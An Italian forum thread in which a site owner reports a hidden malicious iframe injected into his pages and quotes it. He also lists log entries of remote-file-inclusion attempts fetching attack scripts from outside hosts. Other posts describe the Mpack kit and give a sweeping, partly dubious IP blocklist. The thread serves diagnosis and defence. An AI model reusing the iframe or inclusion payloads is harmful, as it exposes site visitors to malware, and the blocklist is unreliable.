• pierfrancescomp
    User Attivo

    [Risolto] Attacco al mio sito web?

    Salve a tutti !

    Oggi dopo avere effettuato un paio di mofiche ad una pagina mi ritrovo questo:

    <iframe src='http://81.95.149.27/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

    cosa che NON ho assolutamente messo io !

    Avete idea di cosa si tratta ??

    Naturalmente ho tolto il tutto.

    Si tratta di malware e spyware ??
    (dato che http://81.95.149.27 porta ad una pagina con inserimento password?)

    Come cavolo hanno potuto inserire questo codice ??

    Grazie in anticipo

    0
  • wolf.otakar
    Consiglio Direttivo

    Ciao indieta,

    ho trovato all'interno del codice di questa pagina, ```
    http://81.95.149.27/logo/index.php

    
Ora, gdfcnt.info, fa riferimento ad una pagina "test", come puoi notare: ```
Fedora Core Test Page
```Ne sai qualcosa?? :)
    0
  • pierfrancescomp
    User Attivo

    assolutamente no !

    Ho trovato in Awstat

    • HTTP Error codes e precisamente 404 Document Not Found

    questi:

    /ahttp://www.rpgnet.com/images/m4f14d3c4lc1nh4.txt

    /ahttp://www.idss.org.do/images/ssccaann.txt

    /ahttp://serc.ilc.edu.tw/echo

    /ahttp://punk3r.altervista.org/doh.txt

    /ahttp://exploits.my-place.us/id.txt

    /ahttp://www.vesa.lv/eval.txt

    /ahttp://shellbr.xpg.com.br/n00gr00d.txt

    e molti altri .....

    si tratta di attacchi per un crack del sito ??

    0
  • wolf.otakar
    Consiglio Direttivo

    @indieta said:

    si tratta di attacchi

    Si! 😞

    Usi tre sistemi di statistiche?? :mmm:

    0
  • pierfrancescomp
    User Attivo

    Non capisco cosa centrano le statistiche
    comunque dal pannello di controllo ci sono :

    • awastat
    • webalizer

    ho trovato questo:
    http://www.abakus-internet-marketing.de/foren/viewtopic/t-42272.html

    Comunque per farti capire meglio:
    sono riusciti a modificare tutti i file di tutte le cartelle
    index.html
    index.htm
    index.php

    inserendo quelle righe di codice

    consigli ??

    0
  • wolf.otakar
    Consiglio Direttivo

    @indieta said:

    Non capisco cosa centrano le statistiche

    Diversi software di statistiche hanno vari bug, ma penso che il tuo problema reale sia una falla nel codice del tuo sito web, che viene sfruttata attraverso qualche exploit! 😞

    0
  • S
    User

    Io ho risolto cambiando il CHMOD di quelle pagine da 755 a 555

    0
  • K
    User Attivo

    Come Sopra ^^

    0
  • wolf.otakar
    Consiglio Direttivo

    Ciao Siremar e benvenuto nel Forum GT! 🙂

    0
  • K
    User Attivo

    La situazione mi pare grave, internet si sta inpestando di questi iframe che puntano a siti stranieri, che scaricano virus e quant'altro, si risolve si impostando i CHMOD in sola lettura dei file ma questo solo su sistemi Unix e non NT, quindi chi come me parecchio tempo fà comprava solo sistemi Windows su Aruba....

    c'è chi parla di bugs negli script, ma così non è poichè le pagine sono composte da semplicissime righe...

    le pagine attaccate solitamente sono login., default., index.*

    come fare? quale soluzione?
    qualcuno sà qualche informazione piu dettagliata o precisa?

    0
  • I
    User Attivo

    ma come è possibile riuscire a inserire un iframe in un sito di un altra persona ????? o nel suo Pc è stato installato un cavallo di troia ? quindi possono fare un login...........
    che tipo di precauzioni dobbiamo prendere??

    0
  • K
    User Attivo

    a saperlo.....
    non l'ho capito nemmeno io...

    0
  • F
    Super User

    Anche io trovo alcuni link strani nella lista di awstat 😞 :mmm:

    0
  • A
    User

    Alcuni Hosting Service Provider tra cui il popolare Aruba e Seeweb, hanno subito (e continuano a subire) un micidiale attacco di grande portata ai server che utilizzano per tenere on-line i siti web dei loro clienti. Lo scopo è quello di corromperne l?home-page con un sistema ancora sconosciuto per rendere il sito un pericoloso diffusore di Malware.

    Gli ignoti attaccanti (comunque sono Russi o Ucraini) agiscono modificando l?home page dei siti colpiti aggiungendo una porzione di codice HTML che incorpora un IFRAME che va a collegarsi ad un sito web che eseguirà un codice nocivo (catalogato da Symantec come Trojan.Mpkit!html).

    Gli utenti che visiteranno i siti corrotti diventeranno le inconsapevoli vittime subendo la violazione del loro sistema.

    Il server a cui l?IFRAME introdotto collega è stato equipaggiato con un kit denominato Mpack (V0.86 e V0.90) che è una serie di codici in linguaggio php che vanno a raccogliere informazioni su che sistema operativo e browser sono utilizzati, in base a queste due informazioni vengono testati una serie di exploit che potrebbero funzionare sul sistema dell?utente-vittima. Fatto ciò le informazioni su quali exploit hanno avuto successo vengono memorizzate e si passa all?ultima fase che consiste nell?utilizzare queste informazioni raccolte per iniettare un trojan downloader che si annida nel processo svchost.exe, a questo punto il sistema dell?ignaro visitatore è compromesso.

    Lo scopo dei "cyberCriminali" è quello di avere disponibile il vostro computer per effettuare ulteriori attacchi, spam e rubare i vostri dati sensibili.

    Cosa fare per difendersi?

    Aggiornate il sistema e tutti i programmi con tutti gli ultimi aggiornamenti disponibili. Usate un antivirus potente ed aggiornato, proteggetevi con un firewall bloccando i seguenti indirizzi IP:

    195.225.176.0 - 195.225.179.255 NETCATHOST Ucraina
    195.234.159.0 - 195.234.159.255 LINO-NET Israele
    85.255.112.0 - 85.255.127.255 Inhoster hosting company Ucraina
    69.50.160.0 - 69.50.191.255 InterCage, Inc. USA
    81.29.240.0 - 81.29.242.63 GLOBALTRADE-NET-1 Russia
    67.15.64.166 - 67.15.64.168 Exploit su questi 3 ip USA
    69.31.0.0 - 69.31.143.255 Pilosoft, Inc USA
    66.230.128.0 - 66.230.191.255 ISPrime, Inc USA
    208.66.195.78 McColo Corporation USA (probabilmente 208.66.192.0 - 208.66.195.255 )
    204.13.160.26 Oversee.net USA (probabilmente 204.13.160.0 - 204.13.163.255)
    216.195.32.0 - 216.195.63.255 Dimago Overseas GmbH NET
    216.255.176.0 - 216.255.191.255 InterCage USA
    195.95.218.0 - 195.95.219.255 INHOSTER Ucraina
    69.22.128.0 - 69.22.191.255 nLayer Communications - InterCage USA
    64.28.176.0 - 64.28.191.255 Cernel, Inc - InterCage, Inc. USA
    216.32.0.0 - 216.35.255.255 Savvis Layered Technologies, Inc. (famoso per il Phishing di numerose banche e anche di posteitaliane )
    208.101.0.0 - 208.101.63.255 SoftLayer Technologies Inc. USA
    209.85.0.0 - 209.85.127.255 Everyones Internet USA
    65.23.128.0 - 65.23.159.255 Datarealm Internet Services USA
    64.111.192.0 - 64.111.223.255 ISPrime, Inc. USA
    69.61.0.0 - 69.61.127.255 Global Compass, Inc. USA
    213.186.116.0 - 213.186.116.255 Utel DataCenter networks. Colocation Ucraina
    70.84.0.0 - 70.87.255.255 ThePlanet.com Internet Services, Inc. USA (escludere dal blocco 70.86.248.122)
    216.240.128.0 - 216.240.159.255 ATMLINK, INC. USA
    216.195.32.0 - 216.195.63.255 APS Telecom USA
    209.66.64.0 - 209.66.127.255 Abovenet Communications, Inc Usa
    195.242.98.0 - 195.242.99.255 INTERNETWORX Olanda
    218.38.13.201 KRNIC-KR Korea
    67.15.119.27 Infodialer.biz (vi ricordate il bastardo master69?)
    66.98.234.86 traffic-advance.net
    67.15.90.95 hostance.net
    84.252.157.79 RUSONYX-NET Russia (quasi sicuramente 84.252.152.0 - 84.252.159.255)
    89.253.244.177 Rusonyx, Ltd. Russia (quasi sicuramente 89.253.192.0 - 89.253.255.255)
    72.232.0.0 - 72.232.255.255 Savvis-Layered Technologies, Inc. USA
    194.178.112.149 Sito pornografico che sfrutta i dialer
    194.178.112.150 Mega deposito di Dialer per Usa e vari paesi europei Italia compresa (non credo legati a gromozon team) Olanda
    216.193.192.0 - 216.193.255.255 Mzima Networks, Inc. USA
    72.36.128.0 - 72.36.255.255 Layered Technologies, Inc. USA
    66.221.0.0 - 66.221.255.255 C I Host USA
    67.18.0.0 - 67.19.255.255 ThePlanet.com Internet Services, Inc. USA (escludere dal blocco 67.18.178.4 e i server PG2)
    216.246.16.234 HostForWeb Inc. (eventualmente 216.246.0.0 - 216.246.127.255) USA
    205.234.235.92 HostForWeb Inc. (eventualmente 205.234.128.0 - 205.234.255.255) USA
    66.36.224.0 - 66.36.255.255 HopOne Internet Corporation USA
    207.150.160.0 - 207.150.191.255 Sago Networks USA
    75.126.0.0 - 75.126.255.255 SoftLayer Technologies Inc. USA
    64.124.0.0 - 64.125.255.255 Abovenet Communications, Inc USA
    85.249.128.0 - 85.249.143.255 DATAPOINT-NET1 Russia
    69.25.0.0 - 69.25.255.255 Internap Network Services USA
    209.85.51.152 Everyones Internet (eventualmente 209.85.0.0 - 209.85.127.255)United Arab Emirates (server USA)
    206.161.0.0 - 206.161.255.255 Beyond The Network America, Inc USA
    64.237.48.241 Choopa, LLC (eventualmente 64.237.32.0 - 64.237.63.255) USA
    195.238.242.0 - 195.238.242.255 MEDIADAT-MOLDOVA
    209.85.84.157 Everyones Internet (range completo gia' segnato come eventuale) USA
    209.67.0.0 - 209.67.255.255 Savvis USA
    64.72.112.0 - 64.72.127.255 Alpha Red, INC USA
    209.160.0.0 - 209.160.79.255 HopOne Internet Corporation USA
    88.214.192.0 - 88.214.255.255 UK-UAONLINE UK
    80.77.80.0 - 80.77.95.255 UK-UAONLINE UK
    72.29.64.0 - 72.29.95.255 HostDime.com, Inc USA
    203.174.83.36 falso codec - Singapore
    125.212.47.244 exploit (Errorsafe) SKYINET-PH Philippines
    207.234.185.217 Errosafe Affinity Internet, Inc USA
    81.9.5.0 - 81.9.5.255 ELTEL Russia
    66.98.244.107 (exploit) Everyones Internet USA
    82.208.60.0 - 82.208.63.255 UPL-TELECOM-CZ Czech Republic
    212.175.219.0 - 212.175.219.255 DGNteknoloji Turkey
    64.38.0.0 - 64.38.63.255 FastServers, Inc USA
    70.47.93.204 Net Access Corporation USA
    69.60.96.0 - 69.60.127.255 Infolink Information Services Inc. USA
    217.11.233.0 - 217.11.233.255 UPL-TELECOM-CZ Czech Republic
    68.178.232.57 alias virgilio.us, registrato tramite Go Daddy Software Usa
    213.244.183.222 (eventualmente 213.244.183.192 - 213.244.183.223 ) EXTREME-NL Netherlands
    65.77.0.0 - 65.77.255.255 Level 3 Communications, Inc. USA
    205.252.0.0 - 205.252.255.255 Beyond The Network America, Inc. USA
    63.208.0.0 - 63.215.255.255 Level 3 Communications, Inc. USA
    209.200.0.0 - 209.200.63.255 Webair Internet Development Inc USA
    69.42.64.0 - 69.42.95.255 Webair Internet Development Inc USA
    216.130.160.0 - 216.130.191.255 Webair Internet Development Inc USA
    69.57.136.90 specialstat.com, hiperstat.com, freestat.ws ecc. Everyones Internet USA
    207.44.196.2 webmeter.ws, www.superstat.info ecc. Everyones Internet USA
    66.98.220.67 megastat.net webmobile.ws ecc. Everyones Internet USA
    67.15.221.147 histats.com Everyones Internet USA
    67.15.58.196 0stat.com Everyones Internet USA
    67.159.0.0 - 67.159.63.255 FDC Servers.net, LLC USA
    69.64.32.0 - 69.64.63.255 Server4You Inc USA
    87.118.96.117 Keyweb AG IP Network Germany
    64.14.0.0 - 64.14.255.255 SAVVIS USA
    67.24.0.0 - 67.31.255.255 Level 3 Communications, Inc USA
    83.149.110.1 NFORCE Netherlands
    66.118.128.0 - 66.118.191.255 SAGO USA
    166.90.0.0 - 166.90.255.255 Level 3 Communications, Inc USA
    209.0.0.0 - 209.0.255.255 Level 3 Communications, Inc USA
    207.90.128.0 - 207.90.191.255 Level 3 Communications, Inc USA
    206.15.0.0 - 206.15.31.255 Level 3 Communications, Inc USA
    192.231.42.0 - 192.231.42.255 Level 3 Communications, Inc USA
    64.152.0.0 - 64.159.255.255 Level 3 Communications, Inc USA
    209.244.0.0 - 209.247.255.255 Level 3 Communications, Inc USA
    69.57.150.226 Everyones Internet USA
    209.185.0.0 - 209.185.255.255 Savvis USA
    125.212.47.243 servercodecs.com Philippines
    125.212.47.244 Philippines
    125.212.47.5 Philippines
    195.62.225.150 Teleasp ltd societa' britannica collegata ad eutelia s.p.a Italia !!!
    64.237.45.146 www.studentessetroie.com/dialers/ Choopa, LLC USA
    82.204.219.0 - 82.204.219.255 POCHTA_RU-NET Russia
    69.46.16.231 HIVELOCITY VENTURES CORP USA
    74.52.110.187 ThePlanet.com USA (eventualmente 74.52.0.0 - 74.53.255.255)
    213.235.135.106,213.235.135.107 home.tiscali.cz:8080/mypge/node36.html
    home.tiscali.cz:8080/mypge/node37.html
    home.tiscali.cz:8080/mypge/node38.html
    81.29.240.0 - 81.29.242.63 UPL TELECOM, s.r.o. Czech Republic
    63.216.0.0 - 63.223.255.255 Beyond The Network America, Inc.
    87.118.96.117 Keyweb AG IP Network Germany
    84.19.178.108 Keyweb AG IP Network Germany
    202.222.30.16 Japan Network Information Center Japan
    66.90.105.50 - 66.90.105.59 (eventualmente 66.90.64.0 - 66.90.127.255) FDC Servers.net, LLC USA
    82.196.5.220 - 82.196.5.221 INETWORK is IEUROP SAS NETWORK France
    82.196.5.70 - 82.196.5.79 INETWORK is IEUROP SAS NETWORK France
    203.174.83.109 - 203.174.83.110 Mizuwork, Singapore
    209.190.85.230 Columbus Network Access Point, Inc. UK
    216.66.21.151 Hurricane Electric USA
    206.51.234.61 - 206.51.234.62 NOC4Hosts Inc.usa
    66.232.119.3 NOC4Hosts Inc.
    89.108.64.0 - 89.108.71.255 AGAVA-DATACENTER-NET Russia
    81.177.16.0 - 81.177.17.255 NETHOUSE-MOSCOW Russia
    38.113.169.25,38.113.169.100,38.113.169.200,
    38.113.169.150,38.113.169.250,38.113.169.3,38.113.169.70,
    38.113.169.50 Performance Systems International Inc. USA
    222.73.247.123 CHINANET-SH China (virus associato ad un sito infetto di ASUS)
    205.209.187.141 Managed Solutions Group, Inc. USA
    209.85.51.180 Everyones Internet United Arab Emirates (server Usa)
    81.95.148.0 - 81.95.151.255 Too Coin Software Limited Russia
    209.63.57.10 Electric Lightwave Inc USA
    81.0.250.0 - 81.0.250.255 UPL TELECOM, s.r.o
    209.190.85.245 Columbus Network Access Point, Inc. UK
    208.70.75.153 AirlineReservations.Com, Inc. Usa
    194.135.19.107 www.oemtop.com (probabilmente 194.135.19.0 - 194.135.19.255) RELCOM.BUSINESS NETWORK" Ltd. Russia
    67.15.113.102 - 67.15.113.106 vari siti civetta Everyones Internet USA
    58.65.239.180 HOSTFRESH Hong Kong
    194.146.207.23 (eventualmente 194.146.204.0 - 194.146.207.255) Nevacon Ltd Russia
    64.62.137.149 Hurricane Electric Usa
    209.51.196.244 eNET Inc. Usa
    204.16.204.56 Setupahost Canada
    81.177.8.30 (eventualmente 81.177.8.0 - 81.177.9.255) Consult It Co. Ltd Russia
    202.75.49.185 Telekom Malaysia Berhad Malaysia
    85.249.135.11 vxcvz.com, burgundy.ru (85.249.128.0 - 85.249.143.255) DATAPOINT-NET1 Russia
    216.12.223.146 Specialstat.com , Hiperstat.com ecc.
    216.12.207.67 - 216.12.207.77 superstat.info, webmeter.ws, www.statistiche.ws ecc.
    66.98.226.25 easyaccesssite.com
    207.218.211.2 extra.advertising.com.bestpage-com.biz , www.page-extras.biz
    212.39.31.11 flat.instantdoor.com
    64.56.68.12 freestats.ws
    206.51.234.64 NOC4Hosts Inc USA
    220.164.140.235 my-securedoc.com CHINANET-YN China
    87.248.163.0 - 87.248.163.255 SC STARNET SRL Moldova
    38.103.54.124 Performance Systems International Inc Usa
    203.121.71.183 kleman.info Time Telecommunications Malaysia
    217.116.228.35 DataWorld Network 1 Netherlands
    217.20.163.25 W NET ISP ( eventualmente 217.20.160.0 - 217.20.163.255) Ucraina
    64.202.120.142 Server Central Network Usa
    84.252.148.80 (quasi sicuramente 84.252.148.0 - 84.252.149.255) MCHOST Russia
    69.46.29.138 HIVELOCITY VENTURES CORP Usa
    66.232.119.7 NOC4Hosts Inc. Usa
    67.15.239.1 - 67.15.239.127 Everyones Internet Usa (assegnati Moldova)
    88.198.120.210 - 88.198.120.222 Marcin Janicki Germany
    208.70.78.139 - 208.70.78.142 AirlineReservations.Com, Inc. Usa
    70.87.127.102 getactual.info ThePlanet com Internet Services, Inc Usa
    212.176.41.8 GRL-EQUANT-NET russia
    206.161.121.115 Beyond The Network America, Inc. Usa (server Russo)
    209.8.0.0 - 209.9.255.255 Beyond The Network America, Inc. Usa
    212.187.128.0 - 212.187.255.255 Level 3 Communications UK
    204.16.207.50 www.drivecleaner.com
    66.244.254.64, 66.244.254.63 (errorsafe,system doctor) Big Pipe Inc.Canada
    207.58.145.114 www.sesso-perverso.ws ServInt Corp Usa
    87.248.208.22 system doctor Limelight Networks Inc Netherlands
    64.38.33.10 - 64.38.33.14 FastServers, Inc Usa
    81.95.144.0 - 81.95.147.255 RBusiness Network (Russia)
    58.65.239.0 - 58.65.239.255 Hostfresh Hong Kong

    NON utilizzate Internet Explorer e cercate di non leggere le email con un client di posta ma di utilizzare i pannelli sul web.

    Procuratevi un software antirootkit per rilevare eventuali attacchi già subiti. Ecco una pagina che vi permetterà di scaricarne alcuni:

    http://antirootkit.com/software

    0
  • pierfrancescomp
    User Attivo

    Dopo vari aggiustamenti e mofiche al sito il problema pare si sia risolto !

    Il problema nasceva da un bug ad un programma che utilizzo ( ma che non era aggiornato) Sendstudio
    http://www.securityfocus.com/archive/1/archive/1/460964/100/0/threaded

    Fatto l'aggiornamento alla nuova versione applicati alcuni accorgimenti al sito,
    il sito e tutti i file non vengono più modificati,
    ma...
    gli attacchi continuano massicci , generando un elevato consumo di banda.

    Come si può ovviare ??
    Avete delle idee o consigli ??

    0
Effettua l'accesso per rispondere